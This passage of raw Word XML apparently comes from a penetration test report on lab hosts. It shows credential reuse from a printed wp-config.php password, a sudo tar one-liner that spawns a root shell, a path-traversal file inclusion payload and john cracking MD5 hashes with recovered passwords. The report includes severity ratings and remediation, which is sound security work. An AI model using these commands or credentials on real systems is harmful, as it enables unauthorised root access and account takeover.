        <w:t>www-data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we have read access to most of Zico’s home folder. It looks like he is experimenting with several content management systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA69" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>www-data@zico:/home/zico$ ls -la</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>ls -la</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>total 9244</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>drwxr-xr-x  6 zico zico    4096 Jun 19  2017 .</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>drwxr-xr-x  3 root root    4096 Jun  8  2017 ..</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>-rw-------  1 zico zico     912 Jun 19  2017 .bash_history</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>-rw-r--r--  1 zico zico     220 Jun  8  2017 .bash_logout</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>-rw-r--r--  1 zico zico    3486 Jun  8  2017 .bashrc</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>-rw-r--r--  1 zico zico     675 Jun  8  2017 .profile</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>drw-------  2 zico zico    4096 Jun  8  2017 .ssh</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>-rw-------  1 zico zico    3509 Jun 19  2017 .viminfo</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>-rw-rw-r--  1 zico zico  504646 Jun 14  2017 bootstrap.zip</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>drwxrwxr-x 18 zico zico    4096 Jun 19  2017 joomla</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>drwxrwxr-x  6 zico zico    4096 Aug 19  2016 startbootstrap-business-casual-gh-pages</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>-rw-rw-r--  1 zico zico      61 Jun 19  2017 to_do.txt</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>drwxr-xr-x  5 zico zico    4096 Jun 19  2017 wordpress</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>-rw-rw-r--  1 zico zico 8901913 Jun 19  2017 wordpress-4.8.zip</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>-rw-rw-r--  1 zico zico    1194 Jun  8  2017 zico-history.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA6A" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Inspecting the files, we find database credentials in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>wp-config.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the Wordpress directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA6B" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>$ cat wp-config.php</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>// ** MySQL settings - You can get this info from your web host ** //</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/** The name of the database for WordPress */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>define('DB_NAME', 'zico');</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/** MySQL database username */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>define('DB_USER', 'zico');</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/** MySQL database password */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>define('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/** MySQL hostname */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>define('DB_HOST', 'zico');</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/** Database Charset to use in creating database tables. */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>define('DB_CHARSET', 'utf8');</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/** The Database Collate type. Don't change this if in doubt. */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>define('DB_COLLATE', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA6C" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Checking for credential re-use, we try to login to SSH with the credentials </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>zico:sWfCsfJSPV9H3AmQzw8</w:t>
      </w:r>
      <w:r>
        <w:t>. It works, and we get a shell as Zico!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA6D" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FCEAE2" wp14:editId="70FCEAE3">
            <wp:extent cx="5943600" cy="3036580"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19" name="Picture" descr="573127717a56050e7ffe4a46c0466022.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture" descr="_resources/4febeff1e4004089a5034bedfe14517d.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3036580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA6E" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>573127717a56050e7ffe4a46c0466022.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA6F" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Running </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>sudo -l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to review Zico’s sudo permissions, we find that we can execute both </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>tar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as root. That’s interesting! Both binaries should allow us to read files as root, but we are of course interested in gaining a full root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA70" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>$ sudo -l</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Matching Defaults entries for zico on this host:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    env_reset, exempt_group=admin, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>User zico may run the following commands on this host:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    (root) NOPASSWD: /bin/tar</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    (root) NOPASSWD: /usr/bin/zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA71" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Luckily, </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:anchor="sudo">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>this page</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> lists how we can (ab)use our sudo permissions on the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>tar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> binary to spawn a full root shell. For this, we simply have to run the following command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA72" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>sudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA73" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Running this command we instantly get dropped into a root shell, giving us full access to the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA74" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="severity-5"/>
      <w:r>
        <w:t>Severity</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w14:paraId="70FCEA75" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Anyone with access to Zico’s account may abuse these privileges to gain full control over the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA76" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="remediation-5"/>
      <w:r>
        <w:t>Remediation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w14:paraId="70FCEA77" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Restrict read access to sensitive files such as the Wordpress configuration file on a need-to-know basis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA78" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Limit (sudo) privileges based on the principle of least privilege.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA79" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Restrict sudo privileges for binaries that allow privilege escalation, consider using POSIX capabilities instead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA7A" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="proof-5"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Proof</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w14:paraId="70FCEA7B" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FCEAE4" wp14:editId="70FCEAE5">
            <wp:extent cx="5943600" cy="4196619"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20" name="Picture" descr="74f94c93d6915e7729c226b54f251707.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture" descr="_resources/78fa26ae3e3249a3957c46f2c205d667.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4196619"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA7C" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>74f94c93d6915e7729c226b54f251707.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA7D" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="miscellaneous-notes-1"/>
      <w:r>
        <w:t>Miscellaneous notes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w14:paraId="70FCEA7E" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">There are more vulnerabilities on the system than those listed above. Firstly, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/view.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> page on the webserver has the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>?page=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameter that loads a webpage to show. As we can prove by entering e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>?page=../../var/www/index.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, this parameter is vulnerable to local file inclusion. However, we don’t seem to be able to access any additional sensitive files at this point because of the limited permissions of user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA7F" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Additionally, We find two hashes in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>test_users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> database, which we can access through </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>phpLiteAdmin</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA80" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FCEAE6" wp14:editId="70FCEAE7">
            <wp:extent cx="5943600" cy="3866134"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="Picture" descr="2fb0b9e0c7062e2ab12c33c227f68b46.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture" descr="_resources/0089524c21be445299eeb07d21069283.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3866134"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA81" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>2fb0b9e0c7062e2ab12c33c227f68b46.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA82" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>Both hashes are weak and can be cracked easily using a widely available wordlist. However, both passwords seem invalid for users on the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA83" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t># john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Using default input encoding: UTF-8</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Loaded 2 password hashes with no different salts (Raw-MD5 [MD5 128/128 AVX 4x3])</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Warning: no OpenMP support for this hash type, consider --fork=8</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Press 'q' or Ctrl-C to abort, almost any other key for status</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>zico2215@        (?)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>34kroot34        (?)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>2g 0:00:00:00 DONE (2020-05-04 04:17) 3.508g/s 21989Kp/s 21989Kc/s 26377KC/s 34mush..34greenboot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA84" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="system-ip-10.0.100.107-lazyadmin"/>
      <w:bookmarkStart w:id="91" w:name="_Toc39759517"/>
      <w:r>
        <w:t>System IP 10.0.100.107 (LazyAdmin)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w14:paraId="70FCEA85" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="system-overview-3"/>
      <w:r>
        <w:t>System overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="pct"/>
        <w:tblLook w:val="07C0" w:firstRow="0" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1620"/>
        <w:gridCol w:w="1280"/>
      </w:tblGrid>
      <w:tr w:rsidR="00863B21" w14:paraId="70FCEA88" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCEA86" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
